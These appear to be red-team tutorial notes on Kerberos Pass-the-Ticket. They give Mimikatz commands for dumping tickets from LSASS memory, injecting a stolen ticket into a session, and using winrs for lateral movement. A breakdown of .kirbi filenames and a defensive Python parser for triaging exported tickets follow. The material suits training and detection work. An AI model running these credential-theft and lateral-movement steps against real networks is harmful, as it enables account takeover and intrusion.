Pass The Ticket
Administrators: Extracting Ticket Granting Services will require us to have Administrator's Credentials.
Standard: Injecting Tickets in our own Session doesn't require Administrator Privileges.
Sometimes it will be possible to extract Kerberos Tickets and Session Keys from LSASS Memory using Mimikatz. The process usually requires us to have SYSTEM Privileges on the Target Machine.
privilege::debug
sekurlsa::tickets /export
While Mimikatz can extract any TGT or TGS available from the Memory of the LSASS Process, most of the time we'll be interested in TGTs, as they can be used to request access to any Service the user is allowed to access. TGSs, by contrast, are only good for a specific service.
Extracting TGTs will require us to have Administrator's Credentials, while extracting TGSs can be done with a Low-Privileged Account (only the ones assigned to that Account).
Using the Ticket
:: Injecting the Ticket
kerberos::ptt [0;e06e9]-0-0-40a50000-delilah.gomez@LDAP-DC.DOMAIN.com.kirbi
Injecting Tickets in our own Session doesn't require Administrator Privileges. After this, the tickets will be available for any Tools we use for Lateral Movement.
:: Displays a list of currently Cached Kerberos Tickets
klist
Once we have a Command Prompt with the Credentials Loaded, we can use winrs to connect to another TARGET on the Domain, since the Credentials are Injected into our Session.
:: The [Username - Password] Fields are not Necessary because the Credentials are already Injected
winrs.exe -r:TARGET cmd
Deeper Explanation
Once the Tickets are Extracted, they are going to be Available in the same Folder as Mimikatz.
[0;97d82]-2-0-40e10000-t2_felicia.dean@krbtgt-DOMAIN.COM.kirbi
└───────┘ ^   └──────┘ └─────────────┘ └───────────────┘└────┘
    |     |       |           |                |           └─────► 6. File Extension
    |     |       |           |                |
    |     |       |           |                └─────► 5. Resource
    |     |       |           |
    |     |       |           └─────► 4. User - Computer Account [Ticket Owner]
    |     |       |
    |     |       └─────► 3. 0x40e10000 Kerberos Flag
    |     |
    |     └─────► 2. Kerberos Ticket Type
    |                0 = TGS / 1 = Client Ticket / 2 = TGT
    |
    └─────► 1. 0x97d82 User LUID
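
The filename layout above is also what an analyst reads when .kirbi files turn up on a host during triage: it tells whose ticket was exported and what kind it was. The parser below is an added example, not part of the original notes; it decodes the fields from the breakdown and expands the flag value into names. The flag names follow RFC 4120 bit numbering as displayed by klist, and the field names "high" and "index" are assumptions, since the page does not label those two positions.

```python
import re

# Ticket type values as listed in the breakdown above.
TICKET_TYPES = {0: "TGS", 1: "Client Ticket", 2: "TGT"}

# Kerberos ticket flag bits (RFC 4120 numbering, names as shown by klist).
TICKET_FLAGS = {
    0x40000000: "forwardable", 0x20000000: "forwarded",
    0x10000000: "proxiable", 0x08000000: "proxy",
    0x04000000: "may_postdate", 0x02000000: "postdated",
    0x01000000: "invalid", 0x00800000: "renewable",
    0x00400000: "initial", 0x00200000: "pre_authent",
    0x00100000: "hw_authent", 0x00040000: "ok_as_delegate",
    0x00010000: "name_canonicalize",
}

# [high;LUID]-type-index-flags-owner@resource.kirbi
# "high" and "index" are not labelled on the page; the names are assumptions.
KIRBI_NAME = re.compile(
    r"^\[(?P<high>[0-9a-f]+);(?P<luid>[0-9a-f]+)\]-(?P<type>\d+)-(?P<index>\d+)"
    r"-(?P<flags>[0-9a-f]{8})-(?P<owner>[^@]+)@(?P<resource>.+)\.kirbi$",
    re.IGNORECASE,
)

def parse_kirbi_name(filename):
    """Return the decoded fields of an exported ticket filename, or None."""
    m = KIRBI_NAME.match(filename)
    if m is None:
        return None
    flags = int(m["flags"], 16)
    ttype = int(m["type"])
    return {
        "luid": int(m["luid"], 16),
        "ticket_type": TICKET_TYPES.get(ttype, f"unknown ({ttype})"),
        "flags": [name for bit, name in TICKET_FLAGS.items() if flags & bit],
        # Bits set in the filename that the table above does not name.
        "unknown_flag_bits": flags & ~sum(TICKET_FLAGS),
        "owner": m["owner"],
        "resource": m["resource"],
    }

if __name__ == "__main__":
    # The two filenames shown on this page.
    for name in (
        "[0;97d82]-2-0-40e10000-t2_felicia.dean@krbtgt-DOMAIN.COM.kirbi",
        "[0;e06e9]-0-0-40a50000-delilah.gomez@LDAP-DC.DOMAIN.com.kirbi",
    ):
        print(name, "->", parse_kirbi_name(name))
```

A result with ticket type TGT and the krbtgt resource identifies the file that carries the account's full access, which is the one to prioritise when deciding whose credentials need resetting.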